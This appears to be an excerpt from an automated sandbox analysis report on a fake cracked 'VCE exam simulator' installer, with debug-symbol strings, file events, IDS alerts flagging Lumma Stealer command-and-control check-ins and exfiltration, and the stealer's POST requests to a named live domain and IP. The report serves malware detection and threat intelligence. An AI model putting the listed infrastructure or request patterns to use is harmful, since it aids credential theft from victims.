            Source: Binary string: VEore-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wsnmp32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: lz32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tpmcompc.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wksprtPS.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaer.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: UserDataTypeHelperUtil.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-provider-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmcfg32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SAS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ntlanui2.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ZipContainer.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wmcodecdspps.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-debug-l1-1-1.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odfox32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mfdvdec.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: NetworkItemFactory.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: LAPRXY.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wsock32.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: API-MS-Win-Core-Kernel32-Private-L1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ws2help.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pwrshplugin.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SyncInfrastructurePS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-string-obsolete-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msiwer.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ms-win-security-lsalookup-l2-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IEFileInstallAI.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wksprtPS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msrle32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: sqlxmlx.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mfH263Enc.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-registry-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-sddl-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odfox32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pcwum.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wmcodecdspps.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shfolder.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: rnr20.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SEMgrPS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: WSClient.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: TTDPlm.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: MFVFW.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaurl.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaer.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmlua.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msrating.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: rnr20.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: uniplat.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wlanutil.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tient.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir50_32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shfolder.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: PerfCounterInstaller.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-threadpool-private-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msimtf.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odtext32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: riched32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: riched32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: hmmapi.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wmdrmsdk.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: spwinsat.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: avicap32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msxactps.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: PerceptionSimulation.ProxyStubs.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: API-MS-Win-Core-ProcessTopology-Obsolete-L1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tapisysprep.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: svcext.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mrt_map.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir41_qcx.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: VirtualDisplayManager.ProxyStubs.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\459250\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\459250Jump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 104.21.33.227:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 104.21.33.227:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.33.227:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.33.227:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.33.227:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 104.21.33.227:443
            Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49742 -> 104.21.33.227:443
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.33.227:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.33.227:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.33.227:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.33.227:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.33.227:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.33.227:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.33.227:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.33.227:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bithithol.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: bithithol.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2D2UJO7589V6LAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18139Host: bithithol.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MTRJJO06User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8724Host: bithithol.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6EVNCTOUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20377Host: bithithol.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KRE4KMW7W5DDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1236Host: bithithol.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2FZJYP1YF9HPNROUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 558955Host: bithithol.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: bithithol.click
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: UJXheBevpnMncefcEO.UJXheBevpnMncefcEO
            Source: global trafficDNS traffic detected: DNS query: bithithol.click
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bithithol.click
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://asp.net/ApplicationServices/v200
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://asp.net/ApplicationServices/v200TU
            Source: Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, vce exam simulator 2.2.1 crackk.exe, Spa.com.1.dr, Earned.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
            Source: Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Spa.com.1.dr, Earned.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
            Source: Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, vce exam simulator 2.2.1 crackk.exe, Spa.com.1.dr, Earned.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Spa.com.1.dr, Earned.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, vce exam simulator 2.2.1 crackk.exe, Spa.com.1.dr, Earned.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://crl.m
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://crl.micros
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://crl.microso
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://crl.microsoft.
            Source: Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://localhost/data.svc
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, vce exam simulator 2.2.1 crackk.exe, Spa.com.1.dr, Earned.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
            Source: Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Spa.com.1.dr, Earned.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Spa.com.1.dr, Earned.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, vce exam simulator 2.2.1 crackk.exe, Spa.com.1.dr, Earned.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://schemas.microsoft.co7
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
            Source: Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Spa.com.1.dr, Earned.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
            Source: Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, vce exam simulator 2.2.1 crackk.exe, Spa.com.1.dr, Earned.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://tempuri.org/.
            Source: Spa.com, 0000000A.00000000.1807694151.0000000000525000.00000002.00000001.01000000.00000007.sdmp, Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Spa.com.1.dr, Earned.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://www.ietf.org/rfc/rfc2396.txt
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://www.micros-core-marshal-l1-1-0.dll
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://www.microso1.0800)4
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://www.microsoft.cov8GM
            Source: vce exam simulator 2.2.1 crackk.exeString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
            Source: Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Spa.com, 0000000A.00000002.2228906491.0000000001B2E000.00000004.00000020.00020000.00000000.sdmp, Spa.com, 0000000A.00000003.2228208170.0000000001D50000.00000004.00000020.00020000.00000000.sdmp, Spa.com, 0000000A.00000003.2227913157.0000000001D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bithithol.click/
            Source: Spa.com, 0000000A.00000003.2137360620.0000000004475000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bithithol.click/api
            Source: Spa.com, 0000000A.00000002.2229354757.0000000001CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bithithol.click/api:
            Source: Spa.com, 0000000A.00000003.2137360620.0000000004475000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bithithol.click/api=
            Source: Spa.com, 0000000A.00000003.2228131384.0000000004475000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bithithol.click/apim
            Source: Spa.com, 0000000A.00000002.2229183883.0000000001CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bithithol.click:443/api
            Source: Spa.com, 0000000A.00000003.2110972526.0000000001D83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
            Source: Spa.com, 0000000A.00000003.2110972526.0000000001D83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
            Source: Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Spa.com, 0000000A.00000003.2110972526.0000000001D83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: Spa.com, 0000000A.00000003.2110972526.0000000001D83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Spa.com, 0000000A.00000003.2110972526.0000000001D83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: Spa.com, 0000000A.00000003.2051002372.000000000454B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: Spa.com, 0000000A.00000003.2110571625.0000000005DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Spa.com, 0000000A.00000003.2110571625.0000000005DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Spa.com, 0000000A.00000003.2051123542.0000000004544000.00000004.00000800.00020000.00000000.sdmp, Spa.com, 0000000A.00000003.2051002372.000000000454B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: Spa.com, 0000000A.00000003.2051123542.0000000004520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: Spa.com, 0000000A.00000003.2051123542.0000000004544000.00000004.00000800.00020000.00000000.sdmp, Spa.com, 0000000A.00000003.2051002372.000000000454B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: Spa.com, 0000000A.00000003.2051123542.0000000004520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: Spa.com, 0000000A.00000003.2110972526.0000000001D83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Spa.com.1.dr, Earned.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Spa.com, 0000000A.00000003.2110972526.0000000001D83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: Earned.0.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Spa.com, 0000000A.00000003.2110571625.0000000005DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: Spa.com, 0000000A.00000003.2110571625.0000000005DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: Spa.com, 0000000A.00000003.2110571625.0000000005DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: Spa.com, 0000000A.00000003.2110571625.0000000005DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Spa.com, 0000000A.00000003.2110571625.0000000005DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeFile created: C:\Windows\RentalSpeakersJump to behavior
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exeFile created: C:\Windows\CreatingContributorJump to behavior
